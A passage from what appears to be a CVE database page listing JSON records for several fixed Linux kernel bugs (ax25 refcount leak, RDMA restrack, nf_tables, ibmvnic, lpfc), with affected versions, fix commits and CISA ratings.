"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.93",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.33",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.12",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.3",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"versionStartIncluding": "5.17",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.277",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.19.240",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.4.190",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.10.112",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "5.15.35",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: Fix reference count leak issue of net_device\n\nThere is a reference count leak issue of the object \"net_device\" in\nax25_dev_device_down(). When the ax25 device is shutting down, the\nax25_dev_device_down() drops the reference count of net_device one\nor zero times depending on if we goto unlock_put or not, which will\ncause memory leak.\n\nIn order to solve the above issue, decrease the reference count of\nnet_device after dev-\u003eax25_ptr is set to null."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:43.328Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/3ec437f9bbae68e9b38115c4c91de995f73f6bad"
},
{
"url": "https://git.kernel.org/stable/c/965d940fb7414b310a22666503d2af69459c981b"
},
{
"url": "https://git.kernel.org/stable/c/8bad3a20a27be8d935f2aae08d3c6e743754944a"
},
{
"url": "https://git.kernel.org/stable/c/eef95df9b752699bddecefa851f64858247246e9"
},
{
"url": "https://git.kernel.org/stable/c/36e56b1b002bb26440403053f19f9e1a8bc075b2"
}
],
"title": "ax25: Fix reference count leak issue of net_device",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-38554",
"datePublished": "2024-06-19T13:35:25.406Z",
"dateReserved": "2024-06-18T19:36:34.920Z",
"dateUpdated": "2025-05-04T12:56:43.328Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-42080 (GCVE-0-2024-42080)
Vulnerability from cvelistv5
Published
2024-07-29 15:52
Modified
2025-05-04 09:22
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
RDMA/restrack: Fix potential invalid address access
struct rdma_restrack_entry's kern_name was set to KBUILD_MODNAME
in ib_create_cq(), while if the module exited but forgot del this
rdma_restrack_entry, it would cause a invalid address access in
rdma_restrack_clean() when print the owner of this rdma_restrack_entry.
These code is used to help find one forgotten PD release in one of the
ULPs. But it is not needed anymore, so delete them.
References
| URL | Tags | ||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
Impacted products
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T04:54:32.089Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/782bdaf9d01658281bc813f3f873e6258aa1fd8d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8ac281d42337f36cf7061cf1ea094181b84bc1a9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f45b43d17240e9ca67ebf3cc82bb046b07cc1c61"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ca537a34775c103f7b14d7bbd976403f1d1525d8"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-42080",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:19:13.837287Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:07.840Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/restrack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "782bdaf9d01658281bc813f3f873e6258aa1fd8d",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "8ac281d42337f36cf7061cf1ea094181b84bc1a9",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "f45b43d17240e9ca67ebf3cc82bb046b07cc1c61",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
},
{
"lessThan": "ca537a34775c103f7b14d7bbd976403f1d1525d8",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/infiniband/core/restrack.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.162",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.97",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.37",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.9.*",
"status": "unaffected",
"version": "6.9.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.10",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.162",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.97",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.37",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9.8",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/restrack: Fix potential invalid address access\n\nstruct rdma_restrack_entry\u0027s kern_name was set to KBUILD_MODNAME\nin ib_create_cq(), while if the module exited but forgot del this\nrdma_restrack_entry, it would cause a invalid address access in\nrdma_restrack_clean() when print the owner of this rdma_restrack_entry.\n\nThese code is used to help find one forgotten PD release in one of the\nULPs. But it is not needed anymore, so delete them."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:22:32.194Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/8656ef8a9288d6c932654f8d3856dc4ab1cfc6b5"
},
{
"url": "https://git.kernel.org/stable/c/782bdaf9d01658281bc813f3f873e6258aa1fd8d"
},
{
"url": "https://git.kernel.org/stable/c/8ac281d42337f36cf7061cf1ea094181b84bc1a9"
},
{
"url": "https://git.kernel.org/stable/c/f45b43d17240e9ca67ebf3cc82bb046b07cc1c61"
},
{
"url": "https://git.kernel.org/stable/c/ca537a34775c103f7b14d7bbd976403f1d1525d8"
}
],
"title": "RDMA/restrack: Fix potential invalid address access",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-42080",
"datePublished": "2024-07-29T15:52:42.228Z",
"dateReserved": "2024-07-29T15:50:41.170Z",
"dateUpdated": "2025-05-04T09:22:32.194Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35897 (GCVE-0-2024-35897)
Vulnerability from cvelistv5
Published
2024-05-19 08:34
Modified
2025-05-04 09:07
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_tables: discard table flag update with pending basechain deletion
Hook unregistration is deferred to the commit phase, same occurs with
hook updates triggered by the table dormant flag. When both commands are
combined, this results in deleting a basechain while leaving its hook
still registered in the core.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3 Version: e10f661adc556c4969c70ddaddf238bffdaf1e87 Version: d9c4da8cb74e8ee6e58a064a3573aa37acf6c935 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 Version: 179d9ba5559a756f4322583388b3213fe4e391b0 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:48.782Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e75faf01e22ec7dc671640fa0e0968964fafd2fc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9a3b90904d8a072287480eed4c3ece4b99d64f78"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b58d0ac35f6d75ec1db8650a29dfd6f292c11362"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6cbbe1ba76ee7e674a86abd43009b083a45838cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9627fd0c6ea1c446741a33e67bc5709c59923827"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7f609f630951b624348373cef99991ce08831927"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1bc83a019bbe268be3526406245ec28c2458a518"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35897",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:41:11.412085Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:16.369Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e75faf01e22ec7dc671640fa0e0968964fafd2fc",
"status": "affected",
"version": "bf8083bbf8fa202e6e5316bbd99759ab82bfe7a3",
"versionType": "git"
},
{
"lessThan": "9a3b90904d8a072287480eed4c3ece4b99d64f78",
"status": "affected",
"version": "e10f661adc556c4969c70ddaddf238bffdaf1e87",
"versionType": "git"
},
{
"lessThan": "b58d0ac35f6d75ec1db8650a29dfd6f292c11362",
"status": "affected",
"version": "d9c4da8cb74e8ee6e58a064a3573aa37acf6c935",
"versionType": "git"
},
{
"lessThan": "6cbbe1ba76ee7e674a86abd43009b083a45838cb",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "9627fd0c6ea1c446741a33e67bc5709c59923827",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "7f609f630951b624348373cef99991ce08831927",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
},
{
"lessThan": "1bc83a019bbe268be3526406245ec28c2458a518",
"status": "affected",
"version": "179d9ba5559a756f4322583388b3213fe4e391b0",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/netfilter/nf_tables_api.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.13"
},
{
"lessThan": "5.13",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.155",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.86",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.26",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.262",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.202",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.155",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.86",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.26",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.5",
"versionStartIncluding": "5.13",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "5.13",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: discard table flag update with pending basechain deletion\n\nHook unregistration is deferred to the commit phase, same occurs with\nhook updates triggered by the table dormant flag. When both commands are\ncombined, this results in deleting a basechain while leaving its hook\nstill registered in the core."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:07:53.215Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e75faf01e22ec7dc671640fa0e0968964fafd2fc"
},
{
"url": "https://git.kernel.org/stable/c/9a3b90904d8a072287480eed4c3ece4b99d64f78"
},
{
"url": "https://git.kernel.org/stable/c/b58d0ac35f6d75ec1db8650a29dfd6f292c11362"
},
{
"url": "https://git.kernel.org/stable/c/6cbbe1ba76ee7e674a86abd43009b083a45838cb"
},
{
"url": "https://git.kernel.org/stable/c/2aeb805a1bcd5f27c8c0d1a9d4d653f16d1506f4"
},
{
"url": "https://git.kernel.org/stable/c/9627fd0c6ea1c446741a33e67bc5709c59923827"
},
{
"url": "https://git.kernel.org/stable/c/7f609f630951b624348373cef99991ce08831927"
},
{
"url": "https://git.kernel.org/stable/c/1bc83a019bbe268be3526406245ec28c2458a518"
}
],
"title": "netfilter: nf_tables: discard table flag update with pending basechain deletion",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35897",
"datePublished": "2024-05-19T08:34:51.799Z",
"dateReserved": "2024-05-17T13:50:33.114Z",
"dateUpdated": "2025-05-04T09:07:53.215Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-48905 (GCVE-0-2022-48905)
Vulnerability from cvelistv5
Published
2024-08-22 01:30
Modified
2025-05-04 08:25
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ibmvnic: free reset-work-item when flushing
Fix a tiny memory leak when flushing the reset work queue.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 Version: 2770a7984db588913e11a6dfcfe3461dbba9b7b2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2022-48905",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:34:20.364742Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:12.189Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/ibm/ibmvnic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "786576c03b313a9ff6585458aa0dfd039d897f51",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
},
{
"lessThan": "58b07100c20e95c78b8cb4d6d28ca53eb9ef81f2",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
},
{
"lessThan": "6acbc8875282d3ca8a73fa93cd7a9b166de5019c",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
},
{
"lessThan": "39738a2346b270e8f72f88d8856de2c167bd2899",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
},
{
"lessThan": "4c26745e4576cec224092e6cc12e37829333b183",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
},
{
"lessThan": "8d0657f39f487d904fca713e0bc39c2707382553",
"status": "affected",
"version": "2770a7984db588913e11a6dfcfe3461dbba9b7b2",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/ethernet/ibm/ibmvnic.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.18"
},
{
"lessThan": "4.18",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.233",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.183",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.104",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.27",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.16.*",
"status": "unaffected",
"version": "5.16.13",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.17",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.233",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.183",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.104",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.27",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16.13",
"versionStartIncluding": "4.18",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.17",
"versionStartIncluding": "4.18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nibmvnic: free reset-work-item when flushing\n\nFix a tiny memory leak when flushing the reset work queue."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:25:50.157Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/786576c03b313a9ff6585458aa0dfd039d897f51"
},
{
"url": "https://git.kernel.org/stable/c/58b07100c20e95c78b8cb4d6d28ca53eb9ef81f2"
},
{
"url": "https://git.kernel.org/stable/c/6acbc8875282d3ca8a73fa93cd7a9b166de5019c"
},
{
"url": "https://git.kernel.org/stable/c/39738a2346b270e8f72f88d8856de2c167bd2899"
},
{
"url": "https://git.kernel.org/stable/c/4c26745e4576cec224092e6cc12e37829333b183"
},
{
"url": "https://git.kernel.org/stable/c/8d0657f39f487d904fca713e0bc39c2707382553"
}
],
"title": "ibmvnic: free reset-work-item when flushing",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2022-48905",
"datePublished": "2024-08-22T01:30:31.825Z",
"dateReserved": "2024-08-21T06:06:23.292Z",
"dateUpdated": "2025-05-04T08:25:50.157Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43816 (GCVE-0-2024-43816)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:26
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
scsi: lpfc: Revise lpfc_prep_embed_io routine with proper endian macro usages
On big endian architectures, it is possible to run into a memory out of
bounds pointer dereference when FCP targets are zoned.
In lpfc_prep_embed_io, the memcpy(ptr, fcp_cmnd, sgl->sge_len) is
referencing a little endian formatted sgl->sge_len value. So, the memcpy
can cause big endian systems to crash.
Redefine the *sgl ptr as a struct sli4_sge_le to make it clear that we are
referring to a little endian formatted data structure. And, update the
routine with proper le32_to_cpu macro usages.
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43816",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:09:16.258182Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:04.878Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_sli.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "9fd003f344d502f65252963169df3dd237054e49",
"status": "affected",
"version": "af20bb73ac2591631d504f3f859f073bcdb7e11e",
"versionType": "git"
},
{
"lessThan": "8bc7c617642db6d8d20ee671fb6c4513017e7a7e",
"status": "affected",
"version": "af20bb73ac2591631d504f3f859f073bcdb7e11e",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/scsi/lpfc/lpfc_sli.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.10"
},
{
"lessThan": "6.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "6.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "6.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: lpfc: Revise lpfc_prep_embed_io routine with proper endian macro usages\n\nOn big endian architectures, it is possible to run into a memory out of\nbounds pointer dereference when FCP targets are zoned.\n\nIn lpfc_prep_embed_io, the memcpy(ptr, fcp_cmnd, sgl-\u003esge_len) is\nreferencing a little endian formatted sgl-\u003esge_len value. So, the memcpy\ncan cause big endian systems to crash.\n\nRedefine the *sgl ptr as a struct sli4_sge_le to make it clear that we are\nreferring to a little endian formatted data structure. And, update the\nroutine with proper le32_to_cpu macro usages."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:54.218Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/9fd003f344d502f65252963169df3dd237054e49"
},
{
"url": "https://git.kernel.org/stable/c/8bc7c617642db6d8d20ee671fb6c4513017e7a7e"
}
],
"title": "scsi: lpfc: Revise lpfc_prep_embed_io routine with proper endian macro usages",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
